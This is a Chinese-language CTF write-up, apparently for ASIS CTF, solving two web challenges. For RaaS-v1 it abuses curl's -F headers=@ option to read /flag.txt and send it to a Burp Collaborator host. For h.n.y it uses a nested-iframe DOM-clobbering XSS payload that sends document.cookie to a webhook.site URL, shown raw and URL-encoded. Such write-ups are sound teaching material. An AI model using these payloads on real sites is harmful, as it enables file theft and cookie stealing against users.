自己就做出来两道,太菜了
RaaS-v1
文档阅读题
题目给了源码
最后命令拼接这里
foreach($formParams as $key => $value){
if(preg_match("/^\w+$/",$key)){
$cmd .= '-F ';
$cmd .= escapeshellarg($key.'= '.$value);
}
}
=
后面多了个空格,导致最后想通过 -F
参数上传文件失败
拼接后是这样的
curl --proto -file "http://127.0.0.1" -X "GET" -F "file= @/flag.txt"
多了空格导致发送的是字符串 @/flag.txt
直接阅读 curl 的官方文档发现这里
https://curl.se/docs/manpage.html#-F
You can add custom headers to the field by setting headers=, like
curl -F "submit=OK;headers=\"X-submit-type: OK\"" example.com
or
curl -F "submit=OK;headers=@headerfile" example.com
可以使用 headers
payload
http://raas-v1.asisctf.com:9000/?url=https://3sw5lub27zg8aeffl8bc7hupegk98y.burpcollaborator.net&method=POST&formParams[file]=submit=OK;headers=@/flag.txt
h.n.y
给了源码
index.html是这样的
<html>
<head>
<title>hi</title>
</head>
<body>
<h1>definitely not vulnerable to XSS</h1>
<div>
MSG
</div>
<script nonce="$nonce$">
try{
eval(window.h.a.p.p.y._.n.e.w._.y.e.a.r._.h.a.c.k.e.r.s.toString())
}catch(e){}
</script>
</body>
</html>
很明显的需要 dom clobbering
这里安利一个工具
https://github.com/splitline/DOM-Clobber3r
用这个工具直接生成即可
(题目由于有CSP的限制,所以这里利用 javascript:location.href='https://webhook.site/d3e541cd-3183-44a1-a437-db45aaf9ffb8/'+document.cookie
的跳转来外带flag)
注意把两边多余的引号去了,跳转的链接也有引号,不然解析会有问题
最后还要注意的一点是 可能dom还没有加载完就执行 eval(window.h.a.p.p.y._.n.e.w._.y.e.a.r._.h.a.c.k.e.r.s.toString())
了,所以最后需要再加几个 同步加载的 link
标签 <link rel="stylesheet" href="style.css">
exp:
<iframe name=h srcdoc="<iframe name=a srcdoc="<iframe name=p srcdoc=&quot;<iframe name=p srcdoc=&amp;quot;<iframe name=y srcdoc=&amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;quot;<iframe name=n srcdoc=&amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;quot;<iframe name=w srcdoc=&amp;amp;amp;amp;amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=y srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=a srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=r srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=h srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=a srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=c srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=k srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=r srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<a id='s' href=javascript:location.href='https://webhook.site/d3e541cd-3183-44a1-a437-db45aaf9ffb8/'+document.cookie></a>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;quot;></iframe>&amp;amp;quot;></iframe>&amp;quot;></iframe>&quot;></iframe>"></iframe>"></iframe><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css">
url编码后发送即可(题目对payload长度做了限制,还要把多余的换行去了)
http://5.75.142.234:9000/hack?p=http%3A%2F%2Flocalhost%3A9000%3Fp%3D%253Ciframe%2520name%253Dh%2520srcdoc%253D%2522%253Ciframe%2520name%253Da%2520srcdoc%253D%2526quot%253B%253Ciframe%2520name%253Dp%2520srcdoc%253D%2526amp%253Bquot%253B%253Ciframe%2520name%253Dp%2520srcdoc%253D%2526amp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dy%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253D_%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dn%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253De%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dw%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253D_%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dy%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253De%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Da%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dr%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253D_%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dh%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Da%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dc%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dk%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253De%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dr%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ca%2520id%253D's'%2520href%253Djavascript%253Alocation.href%253D'https%253A%252F%252Fwebhook.site%252Fd3e541cd-3183-44a1-a437-db45aaf9ffb8%252F'%252Bdocument.cookie%253E%253C%252Fa%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bquot%253B%253E%253C%252Fiframe%253E%2526quot%253B%253E%253C%252Fiframe%253E%2522%253E%253C%252Fiframe%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E